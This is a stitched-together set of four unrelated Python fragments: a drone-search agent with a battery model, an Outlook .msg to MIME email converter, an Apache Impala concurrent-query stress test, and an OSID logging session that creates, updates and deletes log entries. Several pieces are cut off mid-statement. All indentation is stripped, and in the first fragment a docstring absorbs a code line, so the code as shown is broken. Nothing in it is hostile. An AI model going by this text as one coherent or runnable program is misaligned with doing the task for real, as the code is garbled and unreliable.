super().__init__(grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents, comms_radius, logged)
#initialize battery model.
self.battery_estimated_state_model = DefaultStochasticBatteryHMM(no_battery_levels)
self.battery_capacity_simulator = battery_capacity_simulator
#use this to terminate simulation if battery drops to 0
self.__prev_battery_readings = []
if not isinstance(charging_locations, list):
self.charging_locations = charging_locations
self.operational_speed = operational_speed
def reset(self):
pass
def terminate_agent(self):
self.end_comms_server()
#ToDo: Edit this to coordinate clocks with other agents. Maybe current agent shouldn't move until timestep is
#equal to other agents?
def _execute_action(self, action):
'''
Updates simulators with action performed. Derived agents would request their physical actuators to carry this out.
'''
#Before agent executes action, maybe it should coordinate with other agents
if action[0] == 'move':
#update battery simulator and battery capacity belief vector as well as receive and update state based on other agent's broadcasts
'''
Updates the battery belief based on percepts from the simulator, given that the agent has moved.
In reality, this would instruct the RAV to move to the desired location and sample battery capacity percepts at fixed
intervals. Updates to the battery_capacity HMM would occur independently as each of these percepts is recorded.
simulated_sensor_readings = []
'''
#update previous and current positions if the battery is not critical
if self.battery_capacity_simulator.get_current_capacity() <= 0.01:
#this simulates the agents battery failing
print("\n-----------------BATTERY FAILURE - AGENT WILL NOT MOVE ANY MORE-----------------\n")
#end the search prematurely since the agent can't move
self._end_search_prematurely = True
return None
else:
intended_next_position = action[1]
distance_to_travel = self.current_pos_intended.distance_to(intended_next_position)
no_seconds = distance_to_travel / self.operational_speed
no_updates = round(no_seconds)
print("Number of | |
# outlookmsgfile.py
# This module converts a Microsoft Outlook .msg file into
# a MIME message that can be loaded by most email programs
# or inspected in a text editor.
#
# This script relies on the Python package compoundfiles
# for reading the .msg container format.
#
# References:
#
# https://msdn.microsoft.com/en-us/library/cc463912.aspx
# https://msdn.microsoft.com/en-us/library/cc463900(v=exchg.80).aspx
# https://msdn.microsoft.com/en-us/library/ee157583(v=exchg.80).aspx
# https://blogs.msdn.microsoft.com/openspecification/2009/11/06/msg-file-format-part-1/
import re
import sys
from functools import reduce
import urllib.parse
import email.message, email.parser, email.policy
from email.utils import parsedate_to_datetime, formatdate, formataddr
import compoundfiles
# MAIN FUNCTIONS
def load(filename_or_stream):
with compoundfiles.CompoundFileReader(filename_or_stream) as doc:
doc.rtf_attachments = 0
return load_message_stream(doc.root, True, doc)
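# Example usage sketch (assumption: 'message.msg' / 'message.eml' are illustrative file
# names, not paths referenced by this module):
#
#   import email.generator
#   msg = load("message.msg")
#   with open("message.eml", "w") as eml:
#       email.generator.Generator(eml).flatten(msg)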
def load_message_stream(entry, is_top_level, doc):
# Load stream data.
props = parse_properties(entry['__properties_version1.0'], is_top_level, entry, doc)
# Construct the MIME message....
msg = email.message.EmailMessage()
# Add the raw headers, if known.
if 'TRANSPORT_MESSAGE_HEADERS' in props:
# Get the string holding all of the headers.
headers = props['TRANSPORT_MESSAGE_HEADERS']
if isinstance(headers, bytes):
headers = headers.decode("utf-8")
# Remove content-type header because the body we can get this
# way is just the plain-text portion of the email and whatever
# Content-Type header was in the original is not valid for
# reconstructing it this way.
headers = re.sub("Content-Type: .*(\n\s.*)*\n", "", headers, flags=re.I)
# Parse them.
headers = email.parser.HeaderParser(policy=email.policy.default)\
.parsestr(headers)
# Copy them into the message object.
for header, value in headers.items():
msg[header] = value
else:
# Construct common headers from metadata.
if 'MESSAGE_DELIVERY_TIME' in props:
msg['Date'] = formatdate(props['MESSAGE_DELIVERY_TIME'].timestamp())
del props['MESSAGE_DELIVERY_TIME']
if 'SENDER_NAME' in props:
if 'SENT_REPRESENTING_NAME' in props:
if props['SENT_REPRESENTING_NAME']:
if props['SENDER_NAME'] != props['SENT_REPRESENTING_NAME']:
props['SENDER_NAME'] += " (" + props['SENT_REPRESENTING_NAME'] + ")"
del props['SENT_REPRESENTING_NAME']
if props['SENDER_NAME']:
msg['From'] = formataddr((props['SENDER_NAME'], ""))
del props['SENDER_NAME']
if 'DISPLAY_TO' in props:
if props['DISPLAY_TO']:
msg['To'] = props['DISPLAY_TO']
del props['DISPLAY_TO']
if 'DISPLAY_CC' in props:
if props['DISPLAY_CC']:
msg['CC'] = props['DISPLAY_CC']
del props['DISPLAY_CC']
if 'DISPLAY_BCC' in props:
if props['DISPLAY_BCC']:
msg['BCC'] = props['DISPLAY_BCC']
del props['DISPLAY_BCC']
if 'SUBJECT' in props:
if props['SUBJECT']:
msg['Subject'] = props['SUBJECT']
del props['SUBJECT']
# Add the plain-text body from the BODY field.
if 'BODY' in props:
body = props['BODY']
if isinstance(body, str):
msg.set_content(body, cte='quoted-printable')
else:
msg.set_content(body, maintype="text", subtype="plain", cte='8bit')
# Plain-text is not available. Use the rich text version.
else:
doc.rtf_attachments += 1
fn = "messagebody_{}.rtf".format(doc.rtf_attachments)
msg.set_content(
"<no plain text message body --- see attachment {}>".format(fn),
cte='quoted-printable')
# Decompress the value to Rich Text Format.
import compressed_rtf
rtf = props['RTF_COMPRESSED']
rtf = compressed_rtf.decompress(rtf)
# Add RTF file as an attachment.
msg.add_attachment(
rtf,
maintype="text", subtype="rtf",
filename=fn)
# # Copy over string values of remaining properties as headers
# # so we don't lose any information.
# for k, v in props.items():
# if k == 'RTF_COMPRESSED': continue # not interested, save output
# msg[k] = str(v)
# Add attachments.
for stream in entry:
if stream.name.startswith("__attach_version1.0_#"):
process_attachment(msg, stream, doc)
return msg
def process_attachment(msg, entry, doc):
# Load attachment stream.
props = parse_properties(entry['__properties_version1.0'], False, entry, doc)
# The attachment content...
blob = props['ATTACH_DATA_BIN']
# Get the filename and MIME type of the attachment.
filename = props.get("ATTACH_LONG_FILENAME") or props.get("ATTACH_FILENAME") or props.get("DISPLAY_NAME")
if isinstance(filename, bytes): filename = filename.decode("utf8")
mime_type = props.get('ATTACH_MIME_TAG', 'application/octet-stream')
if isinstance(mime_type, bytes): mime_type = mime_type.decode("utf8")
filename = urllib.parse.quote_plus(filename)
# Python 3.6.
if isinstance(blob, str):
msg.add_attachment(
blob,
filename=filename)
elif isinstance(blob, bytes):
msg.add_attachment(
blob,
maintype=mime_type.split("/", 1)[0], subtype=mime_type.split("/", 1)[-1],
filename=filename)
else: # a Message instance
msg.add_attachment(
blob,
filename=filename)
def parse_properties(properties, is_top_level, container, doc):
# Read a properties stream and return a Python dictionary
# of the fields and values, using human-readable field names
# in the mapping at the top of this module.
# Load stream content.
with doc.open(properties) as stream:
stream = stream.read()
# Skip header.
i = (32 if is_top_level else 24)
# Read 16-byte entries.
ret = { }
while i < len(stream):
# Read the entry.
property_type = stream[i+0:i+2]
property_tag = stream[i+2:i+4]
flags = stream[i+4:i+8]
value = stream[i+8:i+16]
i += 16
# Turn the byte strings into numbers and look up the property type.
property_type = property_type[0] + (property_type[1]<<8)
property_tag = property_tag[0] + (property_tag[1]<<8)
if property_tag not in property_tags: continue # should not happen
tag_name, _ = property_tags[property_tag]
tag_type = property_types.get(property_type)
# Fixed Length Properties.
if isinstance(tag_type, FixedLengthValueLoader):
value = tag_type.load(value)
# Variable Length Properties.
elif isinstance(tag_type, VariableLengthValueLoader):
value_length = stream[i+8:i+12] # not used
# Look up the stream in the document that holds the value.
streamname = "__substg1.0_{0:0{1}X}{2:0{3}X}".format(property_tag,4, property_type,4)
try:
with doc.open(container[streamname]) as innerstream:
value = innerstream.read()
except:
# Stream isn't present!
print("stream missing", streamname, file=sys.stderr)
continue
value = tag_type.load(value)
elif isinstance(tag_type, EMBEDDED_MESSAGE):
# Look up the stream in the document that holds the attachment.
streamname = "__substg1.0_{0:0{1}X}{2:0{3}X}".format(property_tag,4, property_type,4)
try:
value = container[streamname]
except:
# Stream isn't present!
print("stream missing", streamname, file=sys.stderr)
continue
value = tag_type.load(value, doc)
else:
# unrecognized type
print("unhandled property type", hex(property_type), file=sys.stderr)
continue
ret[tag_name] = value
return ret
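# Worked example of one 16-byte property entry (an illustration consistent with the
# parsing above, not data taken from a real file): the little-endian bytes
#   03 00 17 00 06 00 00 00 01 00 00 00 00 00 00 00
# decode to property_type 0x0003 (INTEGER32) and property_tag 0x0017 (IMPORTANCE), so the
# fixed-length loader reads the 8-byte value field and yields {'IMPORTANCE': 1}. For a
# variable-length type such as 0x001E (STRING8) with tag 0x001A (MESSAGE_CLASS), the value
# is instead read from the sibling stream named '__substg1.0_001A001E'.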
# PROPERTY VALUE LOADERS
class FixedLengthValueLoader(object):
pass
class NULL(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring with unused content.
return None
class BOOLEAN(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring holding a two-byte integer.
return value[0] == 1
class INTEGER16(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring holding a two-byte integer.
return reduce(lambda a, b : (a<<8)+b, reversed(value[0:2]))
class INTEGER32(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring holding a four-byte integer.
return reduce(lambda a, b : (a<<8)+b, reversed(value[0:4]))
class INTEGER64(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring holding an eight-byte integer.
return reduce(lambda a, b : (a<<8)+b, reversed(value))
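# Clarifying note (equivalent formulation, added for reference): the reduce() idiom in the
# integer loaders above is simply a little-endian byte decode, e.g. for INTEGER16
#   reduce(lambda a, b: (a << 8) + b, reversed(b'\x17\x00'[0:2])) == 0x17 == 23
# which matches int.from_bytes(b'\x17\x00', 'little') on Python 3.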
class INTTIME(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring encoding the integer number of
# 100-nanosecond intervals since January 1, 1601.
from datetime import datetime, timedelta
value = reduce(lambda a, b : (a<<8)+b, reversed(value)) # bytestring to integer
value = datetime(1601, 1, 1) + timedelta(seconds=value/10000000)
return value
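# Worked example (using the well-known FILETIME epoch offset, included for illustration):
# value == 116444736000000000 hundred-nanosecond ticks gives
#   datetime(1601, 1, 1) + timedelta(seconds=11644473600) == datetime(1970, 1, 1),
# i.e. the Unix epoch.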
# TODO: The other fixed-length data types:
# "FLOAT", "DOUBLE", "CURRENCY", "APPTIME", "ERROR"
class VariableLengthValueLoader(object):
pass
class BINARY(VariableLengthValueLoader):
@staticmethod
def load(value):
# value is a bytestring. Just return it.
return value
class STRING8(VariableLengthValueLoader):
@staticmethod
def load(value):
# value is a bytestring. I haven't seen specified what character encoding
# is used when the Unicode storage type is not used, so we'll assume it's
# ASCII or Latin-1 like but we'll use UTF-8 to cover the bases.
return value.decode("utf8")
class UNICODE(VariableLengthValueLoader):
@staticmethod
def load(value):
# value is a bytestring holding UTF-16 encoded text (this is the Unicode
# storage type), so decode it accordingly.
return value.decode("utf16")
# TODO: The other variable-length tag types are "CLSID", "OBJECT".
class EMBEDDED_MESSAGE(object):
@staticmethod
def load(entry, doc):
return load_message_stream(entry, False, doc)
# CONSTANTS
# These constants are defined by the Microsoft Outlook file format
# and identify the data types and data fields in the .msg file.
# from mapidefs.h via https://github.com/inverse-inc/openchange.old/blob/master/libmapi/mapidefs.h
property_types = {
0x1: NULL(),
0x2: INTEGER16(),
0x3: INTEGER32(),
0x4: "FLOAT",
0x5: "DOUBLE",
0x6: "CURRENCY",
0x7: "APPTIME",
0xa: "ERROR",
0xb: BOOLEAN(),
0xd: EMBEDDED_MESSAGE(),
0x14: INTEGER64(),
0x1e: STRING8(),
0x1f: UNICODE(),
0x40: INTTIME(),
0x48: "CLSID",
0xFB: "SVREID",
0xFD: "SRESTRICT",
0xFE: "ACTIONS",
0x102: BINARY(),
}
# from mapitags.h via https://github.com/mvz/email-outlook-message-perl/blob/master/mapitags.h
property_tags = {
0x01: ('ACKNOWLEDGEMENT_MODE', 'I4'),
0x02: ('ALTERNATE_RECIPIENT_ALLOWED', 'BOOLEAN'),
0x03: ('AUTHORIZING_USERS', 'BINARY'),
# Comment on an automatically forwarded message
0x04: ('AUTO_FORWARD_COMMENT', 'STRING'),
# Whether a message has been automatically forwarded
0x05: ('AUTO_FORWARDED', 'BOOLEAN'),
0x06: ('CONTENT_CONFIDENTIALITY_ALGORITHM_ID', 'BINARY'),
0x07: ('CONTENT_CORRELATOR', 'BINARY'),
0x08: ('CONTENT_IDENTIFIER', 'STRING'),
# MIME content length
0x09: ('CONTENT_LENGTH', 'I4'),
0x0A: ('CONTENT_RETURN_REQUESTED', 'BOOLEAN'),
0x0B: ('CONVERSATION_KEY', 'BINARY'),
0x0C: ('CONVERSION_EITS', 'BINARY'),
0x0D: ('CONVERSION_WITH_LOSS_PROHIBITED', 'BOOLEAN'),
0x0E: ('CONVERTED_EITS', 'BINARY'),
# Time to deliver for delayed delivery messages
0x0F: ('DEFERRED_DELIVERY_TIME', 'SYSTIME'),
0x10: ('DELIVER_TIME', 'SYSTIME'),
# Reason a message was discarded
0x11: ('DISCARD_REASON', 'I4'),
0x12: ('DISCLOSURE_OF_RECIPIENTS', 'BOOLEAN'),
0x13: ('DL_EXPANSION_HISTORY', 'BINARY'),
0x14: ('DL_EXPANSION_PROHIBITED', 'BOOLEAN'),
0x15: ('EXPIRY_TIME', 'SYSTIME'),
0x16: ('IMPLICIT_CONVERSION_PROHIBITED', 'BOOLEAN'),
# Message importance
0x17: ('IMPORTANCE', 'I4'),
0x18: ('IPM_ID', 'BINARY'),
0x19: ('LATEST_DELIVERY_TIME', 'SYSTIME'),
0x1A: ('MESSAGE_CLASS', 'STRING'),
0x1B: ('MESSAGE_DELIVERY_ID', 'BINARY'),
0x1E: ('MESSAGE_SECURITY_LABEL', 'BINARY'),
0x1F: ('OBSOLETED_IPMS', 'BINARY'),
# Person a message was originally for
0x20: ('ORIGINALLY_INTENDED_RECIPIENT_NAME', 'BINARY'),
0x21: ('ORIGINAL_EITS', 'BINARY'),
0x22: ('ORIGINATOR_CERTIFICATE', 'BINARY'),
0x23: ('ORIGINATOR_DELIVERY_REPORT_REQUESTED', 'BOOLEAN'),
# Address of the message sender
0x24: ('ORIGINATOR_RETURN_ADDRESS', 'BINARY'),
0x25: ('PARENT_KEY', 'BINARY'),
0x26: ('PRIORITY', 'I4'),
0x27: ('ORIGIN_CHECK', 'BINARY'),
0x28: ('PROOF_OF_SUBMISSION_REQUESTED', 'BOOLEAN'),
# Whether a read receipt is desired
0x29: ('READ_RECEIPT_REQUESTED', 'BOOLEAN'),
| |
# tests/stress/concurrent_select.py
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# This module is used to stress test Impala by running queries concurrently.
#
# Stress test outline (and notes):
# 1) Get a set of queries as requested by the user from the CLI options.
# 2) For each query, run it individually to find:
# a) Minimum mem limit to avoid spilling
# b) Minimum mem limit to successfully run the query (spilling allowed)
# c) Runtime when no mem was spilled
# d) Runtime when mem was spilled
# e) A row order independent hash of the result set.
# This is a slow process so the results will be written to disk for reuse.
# 3) Find the memory available to Impalad. This will be done by finding the minimum
# memory available across all impalads (-mem_limit startup option). Ideally, for
# maximum stress, all impalads will have the same memory configuration but this is
# not required.
# 4) Optionally, set an amount of memory that can be overcommitted. Overcommitting
# memory can increase memory pressure which can result in memory being spilled to
# disk or queries failing with out-of-memory.
# 5) Start submitting queries. There are two modes for throttling the number of
# concurrent queries, depending on --test-admission-control.
# a) test-admission-control=false: Submit queries until all available memory (as
# determined by items 3 and 4) is used. Before running the query a query mem
# limit is set between 2a and 2b. (There is a runtime option to increase the
# likelihood that a query will be given the full 2a limit to avoid spilling.)
# b) test-admission-control=true: Submit enough queries to achieve the desired
# level of overcommit, but expect that Impala's admission control will throttle
# queries. In this mode mem_limit is not set per query.
# 6) Randomly cancel queries to test cancellation. There is a runtime option to control
# the likelihood that a query will be randomly canceled.
# 7) If a query errored, verify that the error is expected. Errors are expected in the
# following cases:
# a) Memory-based admission control is not being tested (i.e.
# --test-admission-control=false), the error is an out-of-memory error and memory
# on the cluster is overcommitted.
# b) The error is an admission control rejection or timeout.
# 8) Verify the result set hash of successful queries if there are no DML queries in the
# current run.
from __future__ import print_function
import logging
import os
import re
import signal
import sys
import threading
from Queue import Empty # Must be before Queue below
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser, Namespace, SUPPRESS
from collections import defaultdict
from copy import copy
from datetime import datetime
from multiprocessing import Lock, Process, Queue, Value
from random import choice, random, randrange, shuffle
from sys import exit, maxint
from tempfile import gettempdir
from textwrap import dedent
from threading import current_thread
from time import sleep, time
import tests.comparison.cli_options as cli_options
from tests.comparison.cluster import Timeout
from tests.comparison.db_types import Int, TinyInt, SmallInt, BigInt
from tests.stress.mem_broker import MemBroker
from tests.stress.runtime_info import save_runtime_info, load_runtime_info
from tests.stress.queries import (QueryType, generate_compute_stats_queries,
generate_DML_queries, generate_random_queries, load_tpc_queries,
load_queries_from_test_file, estimate_query_mem_mb_usage)
from tests.stress.query_runner import (QueryRunner, QueryTimeout,
NUM_QUERIES_DEQUEUED, NUM_QUERIES_SUBMITTED, NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED,
NUM_QUERIES_FINISHED, NUM_QUERIES_EXCEEDED_MEM_LIMIT, NUM_QUERIES_AC_REJECTED,
NUM_QUERIES_AC_TIMEDOUT, NUM_QUERIES_CANCELLED, NUM_RESULT_MISMATCHES,
NUM_OTHER_ERRORS, RESULT_HASHES_DIR)
from tests.stress.util import create_and_start_daemon_thread, increment, print_stacks
from tests.util.parse_util import (
EXPECTED_TPCDS_QUERIES_COUNT, EXPECTED_TPCH_NESTED_QUERIES_COUNT,
EXPECTED_TPCH_STRESS_QUERIES_COUNT)
LOG = logging.getLogger(os.path.splitext(os.path.basename(__file__))[0])
PROFILES_DIR = "profiles"
class StressArgConverter(object):
def __init__(self, args):
"""
Convert arguments as returned from from argparse parse_args() into internal forms.
The purpose of this object is to do any conversions needed from the type given by
parge_args() into internal forms. For example, if a commandline option takes in a
complicated string that needs to be converted into a list or dictionary, this is the
place to do it. Access works the same as on the object returned by parse_args(),
i.e., object.option_attribute.
In most cases, simple arguments needn't be converted, because argparse handles the
type conversion already, and in most cases, type conversion (e.g., "8" <str> to 8
<int>) is all that's needed. If a property getter below doesn't exist, it means the
argument value is just passed along unconverted.
Params:
args: argparse.Namespace object (from argparse.ArgumentParser().parse_args())
"""
assert isinstance(args, Namespace), "expected Namespace, got " + str(type(args))
self._args = args
self._common_query_options = None
def __getattr__(self, attr):
# This "proxies through" all the attributes from the Namespace object that are not
# defined in this object via property getters below.
return getattr(self._args, attr)
@property
def common_query_options(self):
# Memoize this, as the integrity checking of --common-query-options need only
# happen once.
if self._common_query_options is not None:
return self._common_query_options
# The stress test sets these, so callers cannot override them.
IGNORE_QUERY_OPTIONS = frozenset([
'ABORT_ON_ERROR',
'MEM_LIMIT',
])
common_query_options = {}
if self._args.common_query_options is not None:
for query_option_and_value in self._args.common_query_options:
try:
query_option, value = query_option_and_value.split('=')
except ValueError:
LOG.error(
"Could not parse --common-query-options: '{common_query_options}'".format(
common_query_options=self._args.common_query_options))
exit(1)
query_option = query_option.upper()
if query_option in common_query_options:
LOG.error(
"Query option '{query_option}' already defined in --common-query-options: "
"'{common_query_options}'".format(
query_option=query_option,
common_query_options=self._args.common_query_options))
exit(1)
elif query_option in IGNORE_QUERY_OPTIONS:
LOG.warn(
"Ignoring '{query_option}' in common query options: '{opt}': "
"The stress test algorithm needs control of this option.".format(
query_option=query_option, opt=self._args.common_query_options))
else:
common_query_options[query_option] = value
LOG.debug("Common query option '{query_option}' set to '{value}'".format(
query_option=query_option, value=value))
self._common_query_options = common_query_options
return self._common_query_options
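# Illustrative behaviour of the property above (hypothetical option values): if
# args.common_query_options == ['RUNTIME_FILTER_MODE=OFF', 'DISABLE_CODEGEN=true'], the
# property returns {'RUNTIME_FILTER_MODE': 'OFF', 'DISABLE_CODEGEN': 'true'}; an entry
# such as 'MEM_LIMIT=2g' would instead be ignored with a warning, because the stress test
# needs control of MEM_LIMIT.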
@property
def runtime_info_path(self):
runtime_info_path = self._args.runtime_info_path
if "{cm_host}" in runtime_info_path:
runtime_info_path = runtime_info_path.format(cm_host=self._args.cm_host)
return runtime_info_path
# To help debug hangs, the stacks of all threads can be printed by sending signal USR1
# to each process.
signal.signal(signal.SIGUSR1, print_stacks)
def print_crash_info_if_exists(impala, start_time):
"""If any impalads are found not running, they will assumed to have crashed and an
error message will be printed to stderr for each stopped impalad. Returns a value
that evaluates to True if any impalads are stopped.
"""
max_attempts = 5
for remaining_attempts in xrange(max_attempts - 1, -1, -1):
try:
crashed_impalads = impala.find_crashed_impalads(start_time)
break
except Timeout as e:
LOG.info(
"Timeout checking if impalads crashed: %s."
% e + (" Will retry." if remaining_attempts else ""))
else:
LOG.error(
"Aborting after %s failed attempts to check if impalads crashed", max_attempts)
raise e
for message in crashed_impalads.itervalues():
print(message, file=sys.stderr)
return crashed_impalads
class StressRunner(object):
"""This class contains functionality related to producing/consuming queries for the
purpose of stress testing Impala.
Queries will be executed in separate processes since python threading is limited
to the use of a single CPU.
"""
# This is the point at which the work queue will block because it is full.
WORK_QUEUE_CAPACITY = 10
def __init__(self):
self.use_kerberos = False
self.common_query_options = {}
self.test_admission_control = False
self._mem_broker = None
self._verify_results = True
self._select_probability = None
# Synchronized blocking work queue for producer/consumers.
self._query_queue = Queue(self.WORK_QUEUE_CAPACITY)
# The Value class provides cross-process shared memory.
self._mem_mb_needed_for_next_query = Value("i", 0)
# This lock provides a way to stop new queries from running. This lock must be
# acquired before writing to the NUM_QUERIES_SUBMITTED metric for the query_runner,
# which is incremented before every query submission. Reading NUM_QUERIES_SUBMITTED is
# allowed without taking this lock.
self._submit_query_lock = Lock()
self.leak_check_interval_mins = None
self._next_leak_check_unix_time = Value("i", 0)
self._max_mem_mb_reported_usage = Value("i", -1) # -1 => Unknown
self._max_mem_mb_usage = Value("i", -1) # -1 => Unknown
self.cancel_probability = 0
self.spill_probability = 0
self.startup_queries_per_sec = 1.0
self.num_successive_errors_needed_to_abort = 1
self._num_successive_errors = Value("i", 0)
self.results_dir = gettempdir()
self._status_headers = [
"Done", "Active", "Executing", "Mem Lmt Ex", "AC Reject", "AC Timeout",
"Cancel", "Err", "Incorrect", "Next Qry Mem Lmt",
"Tot Qry Mem Lmt", "Tracked Mem", "RSS Mem"]
self._num_queries_to_run = None
self._query_producer_thread = None
# This lock is used to synchronize access to the '_query_runners' list and also to all
# the '_past_runners*' members.
self._query_runners_lock = Lock()
| |
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy)
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def create_log_entry(self, log_entry_form):
"""Creates a new ``LogEntry``.
arg: log_entry_form (osid.logging.LogEntryForm): the form for
this ``LogEntry``
return: (osid.logging.LogEntry) - the new ``LogEntry``
raise: IllegalState - ``log_entry_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``log_entry_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``log_entry_form`` did not originate from
``get_log_entry_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('logging',
collection='LogEntry',
runtime=self._runtime)
if not isinstance(log_entry_form, ABCLogEntryForm):
raise errors.InvalidArgument('argument type is not an LogEntryForm')
if log_entry_form.is_for_update():
raise errors.InvalidArgument('the LogEntryForm is for update only, not create')
try:
if self._forms[log_entry_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('log_entry_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('log_entry_form did not originate from this session')
if not log_entry_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
if 'timestamp' not in log_entry_form._my_map or log_entry_form._my_map['timestamp'] is None:
log_entry_form._my_map['timestamp'] = DateTime.utcnow()
log_entry_form._my_map['agentId'] = str(self.get_effective_agent_id())
insert_result = collection.insert_one(log_entry_form._my_map)
self._forms[log_entry_form.get_id().get_identifier()] = CREATED
result = objects.LogEntry(
osid_object_map=collection.find_one({'_id': insert_result.inserted_id}),
runtime=self._runtime,
proxy=self._proxy)
return result
def can_update_log_entries(self):
"""Tests if this user can update log entries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating a ``Log``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer update
operations to unauthorized users.
return: (boolean) - ``false`` if ``LogEntry`` modification is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_update_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_update_catalogs()
return True
@utilities.arguments_not_none
def get_log_entry_form_for_update(self, log_entry_id):
"""Gets the log entry form for updating an existing log.
A new log entry form should be requested for each update
transaction.
arg: log_entry_id (osid.id.Id): the ``Id`` of the
``LogEntry``
return: (osid.logging.LogEntryForm) - the log entry form
raise: NotFound - ``log_entry_id`` is not found
raise: NullArgument - ``log_entry_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_update_template
collection = JSONClientValidated('logging',
collection='LogEntry',
runtime=self._runtime)
if not isinstance(log_entry_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
if (log_entry_id.get_identifier_namespace() != 'logging.LogEntry' or
log_entry_id.get_authority() != self._authority):
raise errors.InvalidArgument()
result = collection.find_one({'_id': ObjectId(log_entry_id.get_identifier())})
obj_form = objects.LogEntryForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[obj_form.get_id().get_identifier()] = not UPDATED
return obj_form
@utilities.arguments_not_none
def update_log_entry(self, log_entry_form):
"""Updates an existing log entry.
arg: log_entry_form (osid.logging.LogEntryForm): the form
containing the elements to be updated
raise: IllegalState - ``log_entry_form`` already used in an
update transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``log_entry_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``log_entry_form`` did not originate from
``get_log_entry_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.update_resource_template
collection = JSONClientValidated('logging',
collection='LogEntry',
runtime=self._runtime)
if not isinstance(log_entry_form, ABCLogEntryForm):
raise errors.InvalidArgument('argument type is not an LogEntryForm')
if not log_entry_form.is_for_update():
raise errors.InvalidArgument('the LogEntryForm is for create only, not update')
try:
if self._forms[log_entry_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('log_entry_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('log_entry_form did not originate from this session')
if not log_entry_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(log_entry_form._my_map)
self._forms[log_entry_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned:
return objects.LogEntry(
osid_object_map=log_entry_form._my_map,
runtime=self._runtime,
proxy=self._proxy)
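# Hypothetical admin-session flow (a sketch only; 'session' stands for an instance of the
# admin session defined above, and the create-form getter is assumed to follow the same
# pattern as the update-form getter):
#
#   form = session.get_log_entry_form_for_create([])
#   entry = session.create_log_entry(form)
#   update_form = session.get_log_entry_form_for_update(entry.get_id())
#   updated_entry = session.update_log_entry(update_form)
#   session.delete_log_entry(updated_entry.get_id())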
def can_delete_log_entries(self):
"""Tests if this user can delete log entries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting a
``LogEntry`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
delete operations to unauthorized users.
return: (boolean) - ``false`` if ``LogEntry`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_delete_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_delete_catalogs()
return True
@utilities.arguments_not_none
def delete_log_entry(self, log_entry_id):
"""Deletes a ``LogEntry``.
arg: log_entry_id (osid.id.Id): the ``Id`` of the
``LogEntry`` to remove
raise: NotFound - ``log_entry_id`` not found
raise: NullArgument - ``log_entry_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.delete_resource_template
collection = JSONClientValidated('logging',
collection='LogEntry',
runtime=self._runtime)
if not isinstance(log_entry_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
log_entry_map = collection.find_one(
dict({'_id': ObjectId(log_entry_id.get_identifier())},
**self._view_filter()))
objects.LogEntry(osid_object_map=log_entry_map, runtime=self._runtime, proxy=self._proxy)._delete()
collection.delete_one({'_id': ObjectId(log_entry_id.get_identifier())})
def can_manage_log_entry_aliases(self):
"""Tests if this user can manage ``Id`` aliases for log entries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``LogEntry`` aliasing is not
